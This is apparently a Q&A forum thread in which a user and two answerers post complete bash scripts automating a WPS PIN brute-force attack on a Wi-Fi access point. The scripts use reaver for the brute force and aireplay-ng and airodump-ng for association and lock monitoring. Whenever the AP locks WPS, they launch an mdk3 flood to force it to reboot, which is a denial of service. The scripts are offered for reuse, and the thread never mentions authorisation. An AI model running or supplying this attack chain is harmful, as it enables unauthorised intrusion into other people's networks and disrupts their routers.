
First, sorry for my poor English. I'm trying to write a bash script to crack an AP's WPS with reaver. The problem is that after trying some WPS PINs, the AP locks WPS, so my reaver is useless.

To get around this, I run an mdk3 attack to force the AP to reboot so I can attack it again (after the reboot, WPS comes back up unlocked).

The problems with this method are:

  1. I have to be at the PC when the AP gets locked, and then
  2. run the mdk3 attack, stop it when the AP reboots, and run the reaver attack again. The solution to this is obviously a script.

I wrote the following lines, which should solve the problem.

I have to say I'm a noob at bash scripting, so this script isn't "professional"; it's just a "workaround" for my problem.

#!/bin/bash

while true; do
    # Switch to the correct channel and save it into $channel
    echo Detecting AP channel
    timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
    rm ap_channel 2> /dev/null
    touch ap_channel
    timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
    channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
    rm ap_channel

    # Attacks the AP while it isn't wps-locked
    rm ap_status 2> /dev/null
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -z "$(grep Locked ap_status)" ]; do
        echo Performing reaver attack
        aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
        timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
    ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
    mdk3_pid=$!
    rm ap_status
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -n "$(grep Locked ap_status)" ]; do
        echo Trying to reboot the AP
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
    kill -9 $mdk3_pid
    echo AP rebooted. Waiting 2 mins till AP init
    sleep 120
done

The problem in this script is that the stdout redirection I use for the airodump output behaves differently when I run the line directly on the command line and when I run it from the script.

timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status

I need a way to run the line above from the script as if I were running it directly in a tty. I can't do this with exec, because I need the script to keep running.

Note: I can't use the -w option of airodump-ng, because it doesn't save the WPS status.

Can anyone help me?

2 Answers

My variant. Fixed delays are replaced with dynamic waits. It counts the tried PINs and the wait times.

Replace "-C gnome-screenshot -f" with your screenshot program or remove it.

#!/bin/bash

while true; do

rm attack 2> /dev/null
rm ap_status 2> /dev/null
rm ap_channel 2> /dev/null
rm assoc 2> /dev/null

AP_SSID="TARGET_ESSID"
AP_BSSID="TARGET_BSSID"
MY_MAC="YOUR_MAC"
MON_INTERFACE=wlan0mon
PREV_SESS_FILE="PREV_SESSION_FILE.wpc"
countTryPin=0
countFile=totalTryPinCount # file that stores the total number of tried PINs across runs
waitTryReboot=0 # seconds spent waiting for the AP to reboot (mdk3 DoS)
waitReboot=0 # seconds spent waiting for the AP to recover after rebooting
touch $countFile

echo -e -n "\n\nDetect channel"

touch assoc
((reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID -A -s $PREV_SESS_FILE) 2>&1) > assoc &
assoc_pid=$!

while [ -z "$(grep Associated assoc)" ]; do
    sleep 3
    echo -n .
done

echo -e "\n\n"
kill -9 $assoc_pid
wait $assoc_pid 2> /dev/null
rm assoc

echo -n "Wait association"
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
ap_channel_pid=$!
while [ -z "$(grep successful ap_channel)" ]; do
    sleep 1
    echo -n "."
done

channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
echo -e "\n\nChannel set to $channel\n\n"
rm ap_channel

touch ap_status
echo -n -e "\nCheck AP WPS lock"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    echo -n .
    sleep 1
    kill -9 $airodump_pid
    wait $airodump_pid 2> /dev/null
done

echo -e "\n\n"
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!

while [ -z "$(grep $AP_SSID ap_status -m 1)" ]; do
    sleep 2
done

kill -9 $airodump_pid
wait $airodump_pid 2> /dev/null

while [ -z "$(grep Locked ap_status -m 1)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    echo -e "\n\nBegin reaver attack\n\n"
    echo -n "Wait association"
    ((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
    ap_channel_pid=$!
    while [ -z "$(grep successful ap_channel)" ]; do
        sleep 1
        echo -n "."
    done
    echo -e "\n\n"
    timeout 10 reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID --no-nacks -vv -s $PREV_SESS_FILE -w -A -g 1 -C gnome-screenshot -f # remove "-C gnome-screenshot -f" or replace it with your screenshot program
    countTryPin=$((countTryPin + 1))
    kill -9 $airodump_pid
    wait $airodump_pid 2> /dev/null
done


# Force a reboot in the AP to unlock WPS
((mdk3 $MON_INTERFACE a -a $AP_BSSID) 2>&1) > attack &
mdk3_pid=$!

echo -e "\n\n"
while [ -n "$(grep Locked ap_status -m 1)" ] && [ -n "$(grep $AP_SSID ap_status -m 1)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 4
    waitTryReboot=$((waitTryReboot + 4))
    echo -e -n "\rTry calling reboot AP. Wait $waitTryReboot sec."
    kill -9 $airodump_pid
    wait $airodump_pid 2> /dev/null
done

# The AP is now rebooted. Kill the mdk3 process and wait for the AP to come back before restarting the reaver attack
kill -9 $mdk3_pid
wait $mdk3_pid 2> /dev/null

totalTryPin=$(cat $countFile)
totalTryPin=$(( ${totalTryPin:-0} + countTryPin ))
echo $totalTryPin > $countFile

echo -e "\n\n"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
    # After the reboot the AP may change channel, so run without a channel
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 5
    waitReboot=$((waitReboot + 5))
    echo -e -n "\rAP rebooting. Wait $waitReboot sec."
    kill -9 $airodump_pid
    wait $airodump_pid 2> /dev/null
done

rm attack
rm ap_status
execTime=$((SECONDS + waitTryReboot + waitReboot))
echo -e "\n\nDone $countTryPin try pin.\
            \nCalling reboot AP wait time $waitTryReboot sec.\
            \nAP rebooting wait time $waitReboot sec.\
            \nTotal execute time $SECONDS sec.\
            \nTotal try pin $totalTryPin\n\n"
sleep 3
SECONDS=0
done
answered 2017-08-27T10:08:05.953

I finally got it. I found a workaround for this problem by redirecting the command's stdout to a file. I'm posting the script; maybe someone can use it.

#!/bin/bash

while true; do

rm attack 2> /dev/null
rm ap_status 2> /dev/null
rm ap_channel 2> /dev/null

# Detects the AP channel
echo Detecting AP channel
timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel
timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
rm ap_channel
echo Detected AP channel $channel

# Attacks the AP using reaver till the AP locks the WPS
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -z "$(grep Locked ap_status)" ]; do
    echo Performing reaver attack
    aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
    timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# Force a reboot in the AP to unlock WPS
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack &
mdk3_pid=$!

((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -n "$(grep Locked ap_status -m 1)" ]; do
    echo Trying to reboot the AP
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 5 mins till AP init
rm attack
rm ap_status
sleep 300

done

The delays are set very long, but that's OK. It depends on the AP; you can change them.

To use the script you need the aircrack, reaver (the latest version, the one with the --wps option), timeout and mdk3 packages.

It would be great if someone who knows bash scripting wanted to modify the script and upload a better one!

answered 2017-02-09T11:16:26.713